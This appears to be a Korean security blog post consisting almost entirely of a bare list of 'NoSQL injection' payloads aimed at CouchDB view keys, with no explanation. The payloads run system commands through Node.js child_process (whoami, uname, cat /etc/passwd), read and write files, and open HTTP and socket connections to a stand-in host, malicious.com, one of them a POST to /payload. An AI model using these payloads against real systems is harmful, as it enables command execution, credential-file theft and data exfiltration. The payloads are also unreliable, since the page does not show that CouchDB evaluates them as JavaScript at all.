Hacking/Web

[CouchDB] NoSQL 인젝션 페이로드

Wermut 2025. 2. 27. 01:30

 

"_design/design_doc/_view/view_name?key=value"
"_design/design_doc/_view/view_name?key=javascript:evilCode"
"_design/design_doc/_view/view_name?key=javascript:require('child_process').execSync('ls').toString()"
"_design/design_doc/_view/view_name?key=javascript:process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()"
"_design/design_doc/_view/view_name?key=javascript:require('http').get('http://malicious.com')"
"_design/design_doc/_view/view_name?key=javascript:require('os').hostname()"
"_design/design_doc/_view/view_name?key=javascript:process.exit()"
"_design/design_doc/_view/view_name?key=javascript:eval('console.log(1)')"
"_design/design_doc/_view/view_name?key=javascript:require('fs').writeFileSync('/tmp/malicious', 'data')"
"_design/design_doc/_view/view_name?key=javascript:require('net').connect(1234, 'malicious.com')"
"_design/design_doc/_view/view_name?key=javascript:require('child_process').exec('ls', (err, stdout) => console.log(stdout))"
"_design/design_doc/_view/view_name?key=javascript:eval('console.log(require("os").totalmem())')"
"_design/design_doc/_view/view_name?key=javascript:require('http').request({hostname: 'malicious.com', path: '/payload', method: 'POST'}).end()"
"_design/design_doc/_view/view_name?key=javascript:require('https').get('https://malicious.com')"
"_design/design_doc/_view/view_name?key=javascript:require('child_process').execSync('uname -a').toString()"
"_design/design_doc/_view/view_name?key=javascript:require('path').resolve('/etc/passwd')"
"_design/design_doc/_view/view_name?key=javascript:eval('require(\"child_process\").execSync(\"whoami\").toString()')"
"_design/design_doc/_view/view_name?key=javascript:require('os').platform()"
"_design/design_doc/_view/view_name?key=javascript:require('crypto').randomBytes(256).toString('hex')"
"_design/design_doc/_view/view_name?key=javascript:require('fs').readFile('/etc/passwd', 'utf8', (err, data) => console.log(data))"
"_design/design_doc/_view/view_name?key=javascript:require('child_process').spawnSync('ls', ['-l'])"
"_design/design_doc/_view/view_name?key=javascript:require('url').parse('http://malicious.com')"
"_design/design_doc/_view/view_name?key=javascript:require('child_process').exec('whoami', (err, stdout) => console.log(stdout))"
"_design/design_doc/_view/view_name?key=javascript:process.env.NODE_ENV"
"_design/design_doc/_view/view_name?key=javascript:require('child_process').execSync('date').toString()"
"_design/design_doc/_view/view_name?key=javascript:require('fs').unlink('/tmp/malicious', (err) => console.log('Deleted'))"
"_design/design_doc/_view/view_name?key=javascript:eval('require(\"os\").cpus()')"
"_design/design_doc/_view/view_name?key=javascript:require('child_process').execSync('cat /var/log/syslog').toString()"
"_design/design_doc/_view/view_name?key=javascript:require('crypto').createHash('sha256').update('data').digest('hex')"
"_design/design_doc/_view/view_name?key=javascript:require('os').userInfo()"

'Hacking > Web' 카테고리의 다른 글

[Dreamhack] web-HTTP-CLI  (0) 2025.03.06
[Dreamhack] cURL-Based Call  (0) 2025.03.05
[Cassandra CQL] NoSQL 인젝션 페이로드  (0) 2025.02.27
[MongoDB] NoSQL 인젝션 페이로드  (0) 2025.02.27
[Dreamhack] Flask-Dev  (0) 2025.02.27

'Hacking/Web'의 다른글

  • 현재글[CouchDB] NoSQL 인젝션 페이로드

관련글

티스토리툴바